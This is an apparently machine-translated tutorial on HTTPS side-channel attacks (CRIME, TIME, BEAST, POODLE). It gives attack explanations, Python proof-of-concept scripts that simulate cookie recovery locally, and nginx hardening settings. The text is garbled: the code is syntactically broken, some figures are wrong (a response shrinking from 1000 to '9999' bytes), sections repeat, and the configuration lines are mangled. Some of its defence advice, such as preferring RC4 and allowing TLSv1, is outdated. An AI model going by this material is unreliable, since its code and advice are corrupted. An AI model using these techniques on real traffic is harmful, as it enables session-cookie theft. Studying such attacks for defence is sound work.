HTTPS attack methods compiled by experts are common

Background

Study common https attack methods

Beast crime breach, and puts forward some suggestions for secure deployment of https based on https features.

HTTPS attacks are mostly used in man-in-the-middle attacks. They are mainly used to perform side-channel-attack based on the compression algorithm used by HTTPS and the CBC encryption mode. The prerequisites for these attacks are harsh, and the victim host must submit many requests to collect sufficient information to decrypt key data.

Common attack methods include BEAST Lucky-13 RC4 Biases crime time breach. This section mainly introduces three of them.

CRIME

Compression Ratio Info-leak Made Easy

Attack principles

Attackers control the victim to send a large number of requests, use the compression algorithm to guess the key information in the request, and determine whether the request is successful based on the response length.

The following is the https header, which can be controlled by the get request address and Cookie. Then, the attacker only needs to constantly change the guess string at the GET address to guess.

GET/sessionid = a HTTP/1.1
Host: bank.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv: 16.0)
Gecko/20100101 Firefox/16.0
Cookie: sessionid = d3b0c44298fc1c149afbf4c8996fb924
 
GET/sessionid = a HTTP/1.1
Host: bank.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv: 16.0)
Gecko/20100101 Firefox/16.0
Cookie: sessionid = d3b0c44298fc1c149afbf4c8996fb924

For example, the Response length is 1000 bytes.

GET/sessionid = d HTTP/1.1.
Host: bank.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv: 16.0)
Gecko/20100101 Firefox/16.0
Cookie: sessionid = d3b0c44298fc1c149afbf4c8996fb924

When an attacker guesses the first letter of the cookie, the Response length will be reduced to 9999 bytes.

After the Response is encrypted by SSL, if the RC4 encryption mode is used, the length does not change randomly. When the BCB encryption mode is used, the length may slightly change due to padding.

Affected encryption algorithms

Deflate = LZ77 + HuffMan
GZip = Headers + Data Compressed using Deflate

Attack prerequisites

Attackers can obtain the victim's network communication package. (Man-in-the-middle attack, ISP supplier)

Browsers and servers support and use compression algorithms.

Attacks can control the victim to send a large number of requests and control the request content.

Defense methods

The client can upgrade the browser to avoid such attacks.

Chrome: 21.0.1180.89 and ABVE
Firefox: 15.0.1 and above
Opera: 12.01 and above
Safari: 5.1.7 and above

The server can disable encryption algorithms to prevent such attacks.

Apache

• SSLCompression flag = "SSLCompression off"

• GnuTLSPriorities flag = "! COMP-DEFLATE"

Prohibit requests that are too frequent.

Modify the compression algorithm flow. User input data is not compressed.

Randomly add undefined junk data.

Impact scope

TLS 1.0.
SPDY protocol (Google ).
Applications that uses TLS compression.
Mozilla Firefox (older versions) that support SPDY.
Google Chrome (older versions) that supported both TLS and SPDY.

POC

This poc does not simulate man-in-the-middle attacks in the real environment, but verifies the feasibility of the attack by using the CRIME idea in python.

Import string
Import zlib
Import sys
Import random
 
Charset = string. letters + string. digits
 
COOKIE = ''. join (random. choice (charset) for x in range (30 ))
 
HEADERS = ("POST/HTTP/1.1rn"
"Host: thebankserver. comrn"
"Connection: keep-alivern"
"User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1rn"
"Accept: */* rn"
"Referer: https://thebankserver.com/rn"
"Cookie: secret =" + COOKIE + "rn"
"Accept-Encoding: gzip, deflate, sdchrn"
"Accept-Language: en-US, en; q = 0.8rn"
"Accept-Charset: ISO-8859-1, UTF-8; q = 0.7, *; q = 0.3rn"
"Rn ")
BODY = ("POST/HTTP/1.1rn"
"Host: thebankserver. comrn"
"Connection: keep-alivern"
"User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1rn"
"Accept: */* rn"
"Referer: https://thebankserver.com/rn"
"Cookie: secret = ")
Cookie = ""
 
Def compress (data ):
 
C = zlib. compressobj ()
Return c. compress (data) + c. flush (zlib. Z_SYNC_FLUSH)
Def getposset (perchar, chars ):
Posset = []
Baselen = len (compress (HEADERS + perchar ))
For I in chars:
T = len (compress (HEADERS + perchar + I ))
If (t <= baselen ):
Posset + = I
Return posset
Def doguess ():
Global cookie
While len (cookie) <30:
Posset = getposset (BODY + cookie, charset)
Trun = 1
Tem_posset = posset
While 1 <len (posset ):
Tem_body = BODY [trun:]
Posset = getposset (tem_body + cookie, tem_posset)
Trun = trun + 1
If len (posset) = 0:
Return False
Cookie + = posset [0]
Print posset [0]
Return True
 
While BODY. find ("rn")> = 0:
If not doguess ():
Print "(-) Changebody"
BODY = BODY [BODY. find ("rn") + 2:]
Print "(+) orign cookie" + COOKIE
Print "(+) Gotten cookie" + cookie

TIME

Timing Info-leak Made Easy

Attack principles

Attackers control the victim to send a large number of requests, use the compression algorithm to guess the key information in the request, and determine whether the request is successful based on the response time. In fact, TIME and CRIME both use the compression algorithm, but CRIME uses the length information as the aid, and TIME information as the aid.

Unable to render embedded object: File (1.jpg) not found.

As shown in the figure above, when the data length is greater than MTU, it will be truncated into two packages for sending, which will produce a large time difference. Attackers keep controlling the packet length around MTU and keep trying to guess the COOKIE. Unable to render embedded object: File (qqimage 20140724172.163.jpg) not found.

As shown in the figure above, we add Padding to increase the data packet size to be equal to MTU. In Case 1, the extraByte we added overlaps with the data to be guessed because of the compression algorithm, the package length is not increased, but extraByte in Case 2 is inconsistent with the data to be guessed, resulting in subcontracting. Attacks can be divided into two cases, Case1 and Case2, based on different response times.

Attack prerequisites

Attacks can control the victim to send a large number of requests and control the request content.

Stable network environment.

Defense methods

Add a random short-time delay to the Response decryption process.

Block frequent requests within a short period of time.

BEAST

Browser Exploit Against SSL/TLS

Attack principles

Attackers control the victim to send a large number of requests and use the CBC encryption mode to guess key information.

The CBC mode works in the same way as the ciphertext of The I-1 block when the I block is encrypted. The more formal expression is as follows:

Ci = E (Key, Ci-1 & oplus; Mi)

Obviously, when you encrypt the first block, there is no difference or between the ciphertext of the previous block. Therefore, the standard practice is to generate a random initialization vector (IV ), it is also different from the first plaintext or. The encryption of the first M0 is as follows:

C0 = E (Key, IV & oplus; M0 ).

Then, encrypt the first M1 as follows:

C1 = E (Key, C0 & oplus; M1 ).

Now, unless C0 happens to be the same as IV (this is very impossible), even if M0 = M1, the two inputs are different for the encryption function. Therefore, C0 & ne; c1. CBC has two basic usage methods:

1. Each record is considered independent; an IV is generated for each record

2. Treat all records as a large object linked together, and continue to use the CBC status between records. This means that the IV of the last record n is the ciphertext of n-1 records.

SSLV3 and TLS1.0 select the second usage. This seems to be an error.

CBC has two basic usage methods:

1. Each record is considered independent; an IV is generated for each record

2. Treat all records as a large object linked together, and continue to use the CBC status between records. This means that the IV of the last record n is the ciphertext of n-1 records.

SSL 3.0 and TLS1.0 select the second usage. Therefore, the security of the encryption algorithm is generated.

Attackers can replace the Data segment to be guessed:

X & oplus; Ci-1 & oplus; P

When the injected content is encrypted, X is exclusive or, and the plaintext block sent to the encryption algorithm is as follows:

Ci-1 & oplus; P

If P = Mi, the new ciphertext block will be the same as Ci, which means that your guess is correct.

Attack prerequisites

Attackers can obtain the victim's network communication package. (Man-in-the-middle attack, ISP supplier)

Attackers need to obtain some permissions to send sensitive data. To insert your information into the SSL/TLS session.

Attackers need to accurately find the ciphertext segments of sensitive data.

Attacks can control the victim to send a large number of requests and control the request content.

Defense methods

Use the RC4 encryption mode instead of the BCB encryption mode.

Deploy TLS 1.1 or a more advanced version to avoid security issues caused by SSL 3.0/TLS 1.0.

Each fixed byte transmitted on the server changes the encryption key once.

Impact scope

TLS 1.0.
SPDY protocol (Google ).
Applications that uses TLS compression.
Mozilla Firefox (older versions) that support SPDY.
Google Chrome (older versions) that supported both TLS and SPDY.

POC

It only simulates the implementation of attack ideas in python, and only guesses the first letter in encoding.

Import sys
Import string
Import random
From Crypto. Cipher import AES
 
Key = 'lyp62/22sh2rlxjf'
Mode = AES. MODE_CBC
Vi = '000000'
Charset = string. letters + string. digits
Cookie = ''. join (random. choice (charset) for x in range (30 ))
HEADERS = ("POST/HTTP/1.1rn"
"Host: thebankserver. comrn"
"Connection: keep-alivern"
"User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1rn"
"Accept: */* rn"
"Referer: https://thebankserver.com/rn"
"Cookie: secret =" + cookie + "rn"
"Accept-Encoding: gzip, deflate, sdchrn"
"Accept-Language: en-US, en; q = 0.8rn"
"Accept-Charset: ISO-8859-1, UTF-8; q = 0.7, *; q = 0.3rn"
"Rn ")
Global pad_num
Def add_padding (plaintext ):
Global pad_num
Pad_num = 16-len (plaintext) % 16
For I in range (0, pad_num ):
Plaintext + = chr (pad_num)
Return plaintext
Def check_padding (plaintext ):
Global pad_num
For I in range (1, pad_num + 1 ):
If (plaintext [-I]! = Chr (pad_num )):
Return False
Return True
 
Def encrypto (plaintext ):
Global pad_num
Obj = AES. new (key, mode, vi)
If (len (plaintext) % 16 ):
Plaintext = add_padding (plaintext)
Else:
Pad_num = 0
Ciphertext = obj. encrypt (plaintext)
If (check_padding (ciphertext )):
Return ciphertext
Else:
Return 0
 
Def decrypto (ciphertext ):
Obj = AES. new (key, mode, vi)
Plaintext = obj. decrypt (ciphertext)
Return plaintext
 
Def findcookie ():
Global HEADERS
Return HEADERS. find ('cret = ') + 7
 
Guess_cookie =''
Pos_cookie = findcookie ()
Pos_block_s = pos_cookie + 16-pos_cookie % 16
HEADERS = HEADERS [: pos_cookie] + (16-pos_cookie % 16 + 15) * 'A' + HEADERS [pos_cookie:]
Encry_head = encrypto (add_padding (HEADERS ))
Per_per_block = encry_head [pos_block_s-16: pos_block_s] # Ci-1
Per_block = encry_head [pos_block_s: pos_block_s + 16] # x
Aft_block = encry_head [pos_block_s + 16: pos_block_s + 32] # Ci + 1
For I in charset:
Guess_block = 'a' * 15 + I
Insert_block = ''. join (chr (ord (a) ^ ord (B) ^ ord (c) for a, B, c in zip (per_block, per_per_block, guess_block ))
Temp_header = HEADERS [: pos_block_s + 16] + insert_block + HEADERS [pos_block_s + 16:]
Encry_temp_header = encrypto (add_padding (temp_header ))
If (aft_block = encry_temp_header [pos_block_s + 32: pos_block_s + 48]):
Print "(+) first byte is:" + I
Print "(+) orign cookie:" + cookie

The attacker first uses a downgrade attack to allow the browser to use ssl v3.0, and then steals the plaintext transmitted to the user through the defects in ssl v3.0 CBC-mode.

POODLE

Downgrade attack

Ssl v3.0 is a protocol that has existed for a long time. Currently, most browsers support this protocol for compatibility, but it is not used first, man-in-the-middle attackers can deny the browser's request to negotiate a high-version protocol and only allow the ssl v3.0 protocol.

Padding Oracle attack

Before the CBC attacks, you can see the following details: Beast, Lucky17, etc.

First, let's look at the CBC-mod encryption and decryption process.

Decryption process

Encryption process

Verification process

MAC1 = hash (plaintext)

Ciphertext = Encode (plaintext + MAC1 + Padding, K) plaintext = Decode (ciphertext, k)-MAC1-Padding (padding length is identified by the last byte)

MAC2 = hash (plaintext) if MAC1 = MAC2, the verification is successful. Otherwise, the verification fails.

Tue 2, Tue 3

Padding Oracle attacks generally meet the rule of knowing, seeking, and defending, as shown in the following figure.

(1) VI

(2) the decrypted data is called midText

(3) Plaintext

If we get two of these three values, we can launch another one, because they are together Xor.

Http://drops.wooyun.org/wp-content/uploads/2014/12/file0004.jpg

In the Poodle attack, we will replace the last data block with the data block we want to guess. As shown in the following figure.

The direct consequence of this is that the CBC integrity verification fails and the data packet is rejected. We assume that the last data block is composed of padding (in fact, we can control the length of the package to achieve this goal, such as increasing the length of path)

Then, CBC integrity verification will pass only when Plaintext [7] = 7 (block is 16 for 15. If the value is not 7, the correct MAC value will be affected if you delete more or less padding, resulting in verification failure.

Then, we only need to constantly change the value of the last bit of (1) IV until (3) when the last bit of Plaintext is 7 (the CBC is verified, we can launch (2) the last digit of mid text.

Biases POODLEBEASTLucky-13RC4

Padding Oracle On Downgraded Legacy Encryptiontext-base-side-channel-attacktime-base-side-channel-attack

Low-version SSL, man-in-the-middle, a large number of data packets, BCB mode low-version SSL, man-in-the-middle, a large number of data packets, controllable Transmission Content, BCB mode response time, a large number of data packets, and controllable transmission content response time, massive Datagram, controllable Transmission Content, RC4 mode

Security Configuration suggestions

The security configuration here uses nginx as an example. It is mainly configured in Nginx. conf.

Use a secure SSL encryption protocol.

Ssl_protocols TLSv1 TLSv1.1 TLSv1.2;

Use a strict encryption method.

12ssl_ciphers 'ecdhe-RSA-AES256-GCM-SHA384: ECDHE-RSA-AES128-GCM-SHA256: DHE-RSA-AES256-GCM-SHA384: DHE-RSA-AES128-GCM-SHA256: ECDHE-RSA-AES256-SHA384: ECDHE-RSA-AES128-SHA256: ECDHE-RSA-AES256-SHA: ECDHE-RSA-AES128-SHA: DHE-RSA-AES256-SHA256: DHE-RSA-AES128-SHA256: DHE-RSA-AES256-SHA: DHE-RSA-AES128-SHA: ECDHE-RSA-DES-CBC3-SHA: EDH-RSA-DES-CBC3-SHA: AES256-GCM-SHA384: AES128-GCM-SHA256: AES256-SHA256: AES128-SHA25: 6: AES256-SHA: AES128-SHA: DES-CBC3-SHA: HIGH :! ANULL :! ENULL :! EXPORT :! CAMELLIA :! DES :! MD5 :! PSK :! RC4 ';

The server password is preferred.

Ssl_prefer_server_ciphers on;

Enable the HSTS protocol.

Add_header Strict-Transport-Security max-age = 15768000;

Redirection configuration

Server {
Listen 80;
Add_header Strict-Transport-Security max-age = 15768000;
Return 301 request_uri "> https://www.yourwebsite.com $ request_uri;
}

Use a 2048-bit digital certificate

Openssl dhparam-out FIG. pem 2048
Ssl_dhparam/path/to/dhparam. pem;